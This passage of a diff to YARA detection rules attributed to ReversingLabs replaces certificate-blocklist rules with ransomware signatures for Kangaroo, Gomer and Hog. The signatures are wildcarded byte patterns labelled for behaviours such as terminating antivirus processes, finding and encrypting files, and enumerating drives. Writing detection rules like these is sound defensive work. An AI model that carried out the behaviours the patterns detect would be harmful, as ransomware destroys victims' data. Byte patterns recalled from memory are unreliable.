+            ?? ?? ?? 66 89 44 24 ?? 89 44 24 ?? 39 46 ?? 0F 84 ?? ?? ?? ?? 8D A4 24 ?? ?? ?? ??
+            80 7E ?? ?? 0F 85 ?? ?? ?? ?? 51 8D 44 24 ?? 50 8D 44 24 ?? 50 8D 4E ?? E8 ?? ?? ??
+            ?? 8B C8 E8 ?? ?? ?? ?? 8B D0 8B 02 85 C0 74 ?? 8B 00 8B 48 ?? 8B 40 ?? 49 23 4A ??
+            8B 04 88 8D 4C 24 ?? 3B C8 74 ?? 6A ?? 6A ?? 50 E8 ?? ?? ?? ?? 8B 46 ?? 8B 4E ?? 48
+            03 C8 8B 46 ?? 48 23 C8 8B 46 ?? 8B 3C 88 83 7F ?? ?? 72 ?? FF 37 E8 ?? ?? ?? ?? 83
+            C4 ?? 33 C0 C7 47 ?? ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 66 89 07 FF 4E ?? 75 ?? 89 46
+            ?? 83 EC ?? 8B CC 6A ?? 89 41 ?? 33 C0 C7 41 ?? ?? ?? ?? ?? 50 66 89 01 8D 44 24 ??
+            50 E8 ?? ?? ?? ?? 51 8B CE E8 ?? ?? ?? ?? 8B C8 0B CA 74 ?? 01 46 ?? 11 56 ?? 83 7C
+            24 ?? ?? 8D 54 24 ?? 0F 43 54 24 ?? 83 EC ?? 8B FC 33 C0 C7 47 ?? ?? ?? ?? ?? C7 47
+            ?? ?? ?? ?? ?? 66 89 07 66 39 02 74 ?? 8B C2 8D 48 ?? 89 4C 24 ?? 66 8B 08 83 C0 ??
+            66 85 C9 75 ?? 2B 44 24 ?? D1 F8 50 52 8B CF E8 ?? ?? ?? ?? 8B 4E ?? 83 79 ?? ?? 8D
+            41 ?? 72 ?? 8B 00 8B 91 ?? ?? ?? ?? 81 C1 ?? ?? ?? ?? 83 79 ?? ?? 72 ?? 8B 09 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 83 7E ?? ?? 0F 85 ?? ?? ?? ?? 83 7C 24 ?? ?? 72 ?? FF 74 24 ??
+            E8 ?? ?? ?? ?? 83 C4 ?? 8B 4C 24 ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4C 24 ?? 33
+            CC E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$terminate_antivirus_processes_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B D9 C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? 33 C0 C7 43 ?? ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 66 89 03 89
+            45 ?? 50 6A ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85
+        }
+		$terminate_antivirus_processes_p2 = {
+            8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8D 49 ?? 33 F6 8B BC B5 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 57 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 39 43 ?? 74 ?? 6A ?? 68 ??
+            ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 66 83 3F ?? 75 ?? 33 C0 EB ?? 8B C7 8D 50 ?? 8D 49 ??
+            66 8B 08 83 C0 ?? 66 85 C9 75 ?? 2B C2 D1 F8 50 57 8B CB E8 ?? ?? ?? ?? 46 83 FE ??
+            72 ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 56 FF
+            15 ?? ?? ?? ?? 8B C3 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ??
+            ?? ?? ?? 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RESURS-RM OOO" and pe.signatures [ i ] . serial == "02:c5:35:19:36:ab:e4:05:ac:76:02:28:a4:03:87:e8" and 1589932801 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $terminate_antivirus_processes_p* ) ) and ( $find_files ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_1Ecd829Adcc55D9D6Afe30Dc371Ebda6 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Kangaroo : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Kangaroo ransomware."
 		author = "ReversingLabs"
-		id = "db9f022b-f650-5d40-ae84-4df92b0f3a96"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "ec4342c1-adc9-5ddb-b403-83c2b1ce5899"
+		date = "2020-07-15"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4402-L4420"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "02955f4df7deccab52cdd82fd04d5012db7440f85c87d750fa9f81ff85e2dab0"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Kangaroo.yara#L1-L91"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "1078fb3d47ad737548419e5ee66e686f705c02fea27a58c0097446547325772c"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Kangaroo"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_p1 = {
+            83 EC ?? 53 55 8B 6C 24 ?? 56 57 33 FF 57 57 6A ?? 57 6A ?? 68 ?? ?? ?? ?? 33 DB 55
+            89 5C 24 ?? 89 7C 24 ?? 89 7C 24 ?? FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 0F 84 ?? ?? ??
+            ?? 8D 44 24 ?? 50 8D 4C 24 ?? 51 8D 54 24 ?? 52 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            6A ?? 68 ?? ?? ?? ?? 57 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ??
+            8B 54 24 ?? 8D 4C 24 ?? 51 57 57 68 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85
+            ?? ?? ?? ?? 57 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 03 C0 50 8B 44 24 ?? 68 ?? ?? ?? ??
+            50 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 54 24 ?? 8B 44 24 ?? 8D 4C 24 ??
+            51 6A ?? 52 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 57 56 FF
+            15 ?? ?? ?? ?? 8B 54 24 ?? 57 8D 4C 24 ?? 51 57 57 6A ?? 57 52 89 44 24 ?? FF 15 ??
+            ?? ?? ?? 8B 44 24 ?? 6A ?? 68 ?? ?? ?? ?? 50 57 8B 3D ?? ?? ?? ?? FF D7 8B 54 24
+        }
+		$encrypt_files_p2 = {
+            6A ?? 8D 4C 24 ?? 51 52 8B D8 53 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B
+            44 24 ?? 8B 54 24 ?? 50 8D 4C 24 ?? 51 53 6A ?? 6A ?? 6A ?? 52 FF 15 ?? ?? ?? ?? 83
+            F8 ?? 0F 85 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56 FF 15 ?? ?? ?? ??
+            8B 4C 24 ?? 6A ?? 8D 44 24 ?? 50 51 53 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 8D 54 24
+            ?? 52 8D 44 24 ?? 50 8D 4C 24 ?? 51 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ??
+            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF D7 68 ?? ?? ?? ?? 55 8B F8 68 ?? ?? ?? ?? 57
+            FF 15 ?? ?? ?? ?? 83 C4 ?? 57 55 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 57 FF 15 ??
+            ?? ?? ?? 8B C5 C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 53 FF 15
+            ?? ?? ?? ?? 8B 54 24 ?? 52 FF 15 ?? ?? ?? ?? 8B 5C 24 ?? 33 FF 8B 44 24 ?? 50 FF 15
+            ?? ?? ?? ?? 89 7C 24 ?? 8B 4C 24 ?? 57 51 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 5F
+            5E 5D 8B C3 5B 83 C4 ?? C3
+        }
+		$find_files = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 8B 75 ?? 57 56 FF 15 ?? ?? ?? ?? 8B 3D ??
+            ?? ?? ?? 33 C9 83 F8 ?? 0F 94 C1 56 8D 94 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 89 4C 24
+            ?? FF D7 83 C4 ?? 8D 44 24 ?? 50 8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 44 24
+            ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? EB ?? EB ?? 8D A4 24 ?? ?? ?? ?? 90
+            8B 3D ?? ?? ?? ?? 83 7C 24 ?? ?? 75 ?? 8D 54 24 ?? 52 56 68 ?? ?? ?? ?? 8D 84 24 ??
+            ?? ?? ?? 50 EB ?? 8D 4C 24 ?? 51 56 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 FF D7 83
+            C4 ?? F6 44 24 ?? ?? 74 ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF D7 85
+            C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4C 24 ?? 51 FF D7 85 C0 0F 84 ?? ?? ?? ?? 8D
+            94 24 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 33 FF 33 F6 EB ?? 8D 9B
+            ?? ?? ?? ?? 8B 86 ?? ?? ?? ?? 50 8D 8C 24 ?? ?? ?? ?? 51 FF D3 85 C0 74 ?? BF ?? ??
+            ?? ?? 83 C6 ?? 83 FE ?? 72 ?? 68 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 FF D3 85 C0 75
+            ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D3 85 C0 74 ?? BF ?? ?? ?? ?? 8B 44 24
+            ?? A8 ?? 75 ?? A9 ?? ?? ?? ?? 75 ?? 85 FF 75 ?? 3D ?? ?? ?? ?? 74 ?? 68 ?? ?? ?? ??
+            8D 8C 24 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8D 94 24 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83
+            C4 ?? 85 C0 75 ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 8C
+            24 ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 75 ?? 8B 44 24 ?? 8D 54 24 ?? 52 50 FF 15 ??
+            ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 4C 24 ?? 51 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D
+            C3
+        }
+		$enum_resources = {
+            55 8B EC 83 E4 ?? 83 EC ?? 8B 4D ?? 53 56 57 8D 44 24 ?? 50 51 6A ?? 6A ?? 6A ?? C7
+            44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 33 C0 5F 5E
+            5B 8B E5 5D C2 ?? ?? 8B 54 24 ?? 52 6A ?? FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 8B 4C
+            24 ?? 8B C3 85 C9 74 ?? 8D 64 24 ?? C6 00 ?? 40 83 E9 ?? 75 ?? 8B 54 24 ?? 8D 44 24
+            ?? 50 53 8D 4C 24 ?? 51 52 E8 ?? ?? ?? ?? 85 C0 75 ?? 33 FF 39 7C 24 ?? 76 ?? 8D 73
+            ?? 8D 49 ?? 83 7E ?? ?? 75 ?? 8B 06 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4E ?? 83 E1 ?? 80
+            F9 ?? 75 ?? 8D 56 ?? 52 E8 ?? ?? ?? ?? 47 83 C6 ?? 3B 7C 24 ?? 72 ?? EB ?? 3D ?? ??
+            ?? ?? 75 ?? 53 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 50 E8 ?? ?? ?? ?? 5F 5E B8 ?? ?? ?? ??
+            5B 8B E5 5D C2
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Komp.IT" and ( pe.signatures [ i ] . serial == "00:1e:cd:82:9a:dc:c5:5d:9d:6a:fe:30:dc:37:1e:bd:a6" or pe.signatures [ i ] . serial == "1e:cd:82:9a:dc:c5:5d:9d:6a:fe:30:dc:37:1e:bd:a6" ) and 1588723200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) ) and ( $enum_resources )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_B0167124Ca59149E64D292Eb4B142014 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Gomer : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Gomer ransomware."
 		author = "ReversingLabs"
-		id = "384ce73e-3ad5-54d9-a140-cb242f9a91e6"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "b76ac856-2abe-531d-b093-461569b9afb7"
+		date = "2020-10-08"
+		modified = "2020-10-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4422-L4440"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "10d980d4a71dab4679376f5a6d6a6999e0b59af4f25587a7b8d1ef52a7808cc9"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Gomer.yara#L1-L106"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "a53d37fcb877a12a4969a6ea1aaa67fc4106c3fbdd80a4fd39ad5a66a9df47fc"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Gomer"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$find_files_p1 = {
+            8B FF 55 8B EC 51 8B 4D ?? 53 57 33 DB 8D 51 ?? 66 8B 01 83 C1 ?? 66 3B C3 75 ?? 8B
+            7D ?? 2B CA D1 F9 83 C8 ?? 41 2B C7 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 56 8D 5F ??
+            03 D9 6A ?? 53 E8 ?? ?? ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ??
+            ?? 83 C4 ?? 85 C0 75 ?? FF 75 ?? 2B DF 8D 04 7E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 85 C0 75 ?? 8B 4D ?? 56 E8 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 8B C6 5E 5F
+            5B 8B E5 5D C3 33 C0 50 50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ??
+            ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 55 ?? 8B 4D ?? 53 8B 5D ?? 56 57 6A ?? 5E 6A ??
+            89 95 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 5F EB ?? 0F B7 01 66 3B 85 ?? ?? ??
+            ?? 74 ?? 66 3B C6 74 ?? 66 3B C7 74 ?? 83 E9 ?? 3B CB 75 ?? 0F B7 31 66 3B F7 75 ??
+            8D 43 ?? 3B C8 74 ?? 52 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 6A ??
+            8B C6 33 FF 5A 66 3B C2 74 ?? 6A ?? 5A 66 3B C2 74 ?? 6A ?? 5A 66 3B C2 74 ?? 8B C7
+        }
+		$find_files_p2 = {
+            EB ?? 33 C0 40 2B CB 0F B6 C0 D1 F9 41 F7 D8 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50
+            57 53 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 75 ?? 8B 85 ?? ?? ?? ?? 50 57 57 53 E8 ?? ??
+            ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD
+            5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 8D ?? ?? ?? ?? 6A ?? 8B 41 ?? 2B 01 C1 F8 ?? 89 85
+            ?? ?? ?? ?? 58 66 39 85 ?? ?? ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 66 39 85 ?? ??
+            ?? ?? 75 ?? 66 39 BD ?? ?? ?? ?? 74 ?? 51 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 8B 8D
+            ?? ?? ?? ?? 85 C0 6A ?? 58 75 ?? 8B C1 8B 8D ?? ?? ?? ?? 8B 10 8B 40 ?? 2B C2 C1 F8
+            ?? 3B C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ??
+            83 C4 ?? E9
+        }
+		$encrypt_files = {
+            55 8B EC 51 8B 45 ?? 53 56 57 8B F9 8B 4F ?? 89 4D ?? 3B C1 77 ?? 8B DF 83 F9 ?? 72
+            ?? 8B 1F 8D 34 00 89 47 ?? 56 FF 75 ?? 53 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 04 1E
+            8B C7 5F 5E 5B 8B E5 5D C2 ?? ?? 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 8B F0 83 CE ?? 81
+            FE ?? ?? ?? ?? 76 ?? BE ?? ?? ?? ?? EB ?? 8B D1 B8 ?? ?? ?? ?? D1 EA 2B C2 3B C8 76
+            ?? BE ?? ?? ?? ?? EB ?? 8D 04 0A 3B F0 0F 42 F0 8D 46 ?? 8D 0C 00 3D ?? ?? ?? ?? 76
+            ?? 83 C9 ?? EB ?? 81 F9 ?? ?? ?? ?? 72 ?? 8D 41 ?? 83 CA ?? 3B C1 0F 46 C2 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8D 58 ?? 83 E3 ?? 89 43 ?? EB ?? 85 C9 74 ?? 51 E8 ??
+            ?? ?? ?? 83 C4 ?? 8B D8 EB ?? 33 DB 8B 45 ?? 89 77 ?? 89 47 ?? 8D 34 00 56 FF 75 ??
+            53 E8 ?? ?? ?? ?? 33 C0 83 C4 ?? 66 89 04 1E 8B 45 ?? 83 F8 ?? 72 ?? 8D 0C 45 ?? ??
+            ?? ?? 8B 07 81 F9 ?? ?? ?? ?? 72 ?? 8B 50 ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 77 ??
+            8B C2 51 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 1F 8B C7 5F 5E 5B 8B E5 5D C2 ?? ?? E8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? CC CC CC CC CC B8 ?? ?? ?? ?? C3
+        }
+		$enum_drives_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89
+            45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 4D ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? FF 15 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 6A ?? 33 C0 C7
+            45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? C6
+            45 ?? ?? BF ?? ?? ?? ?? 8D 45 ?? 0F A3 38 0F 83 ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 8D
+            47 ?? 0F 43 4D ?? 66 89 01 8D 45 ?? 83 7D ?? ?? 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 83
+            F8 ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 33 C9 C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? 66 89 4D ?? C6 45 ?? ?? 83 F8 ?? 75 ?? 6A ?? 68 ?? ?? ?? ?? EB ??
+            83 F8 ?? 75 ?? 6A ?? 68 ?? ?? ?? ?? EB ?? 83 F8 ?? 75 ?? 6A ?? 68 ?? ?? ?? ?? 8D 4D
+            ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 55 ?? 56 8D 4D ?? E8 ?? ??
+            ?? ?? 8B 4D ?? B8 ?? ?? ?? ?? 2B CE C6 45 ?? ?? F7 E9 83 C4 ?? C1 FA ?? 8B DA C1 EB
+            ?? 03 DA 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ??
+            ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ??
+            ?? ?? 83 C4 ?? FF 35 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 55 ?? 56 8D 4D ?? E8 ?? ?? ??
+            ?? 8B 4D ?? B8 ?? ?? ?? ?? 2B CE 89 7D ?? F7 E9 83 C4 ?? 89 5D ?? C1 FA ?? 8D 4D
+        }
+		$enum_drives_p2 = {
+            8B C2 C1 E8 ?? 03 C2 89 45 ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 45 ?? FF 75
+            ?? 50 51 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B
+            4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83
+            C0 ?? 83 F8 ?? 0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 47 83 FF ?? 0F 8C ??
+            ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B D8 89 5D ?? C6 45 ?? ?? 8B 4D ?? 8B 31
+            3B F1 0F 84 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? FF 75 ?? 8B C8 C6 45
+            ?? ?? 6A ?? E8 ?? ?? ?? ?? 8B F8 C6 45 ?? ?? 8B 4E ?? 89 4F ?? 8B 4E ?? 89 4F ?? 8D
+            4F ?? 8B 46 ?? 89 47 ?? 8D 46 ?? 3B C8 74 ?? 83 78 ?? ?? 8B D0 72 ?? 8B 10 FF 70 ??
+            52 E8 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 57 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Euro May SP Z O O" and ( pe.signatures [ i ] . serial == "00:b0:16:71:24:ca:59:14:9e:64:d2:92:eb:4b:14:20:14" or pe.signatures [ i ] . serial == "b0:16:71:24:ca:59:14:9e:64:d2:92:eb:4b:14:20:14" ) and 1585267200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $enum_drives_p* ) ) and ( all of ( $find_files_p* ) ) and ( $encrypt_files )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_112613B7B5F696Cf377680F6463Fcc8C : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Hog : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Hog ransomware."
 		author = "ReversingLabs"
-		id = "c0015521-b163-51ab-8c27-da3b1a8df084"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "b4f26acf-5ff1-5c49-8cfa-8f619af84efd"
+		date = "2021-10-12"
+		modified = "2021-10-12"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L4442-L4458"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "50fd35617e059a5fe9d9e0fdb4b880c20e406357bbb2d037f9e6e9db47b8e49f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/ByteCode.MSIL.Ransomware.Hog.yara#L1-L70"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "c5cbc79fee9083ed3befa6b0d348f2d38064bb9012b8f0ca11afd7137243866d"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Hog"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$generate_key = {
+            73 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 1A 8D ?? ?? ?? ?? 0C 2B ?? 07 08 6F ?? ?? ?? ?? 08
+            16 28 ?? ?? ?? ?? 0D 06 72 ?? ?? ?? ?? 09 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 5E 28 ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 26 02 25 17 59 10 ?? 16 30 ?? 06 6F ?? ?? ?? ?? 13 ?? DE ?? 07 2C ??
+            07 6F ?? ?? ?? ?? DC 11 ?? 2A
+        }
+		$find_files = {
+            16 7E ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A 06 16 16 6F ?? ?? ?? ?? 2D ?? DD ?? ?? ?? ?? 00 1F
+            ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ??
+            ?? ?? 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ??
+            6F ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 7E ??
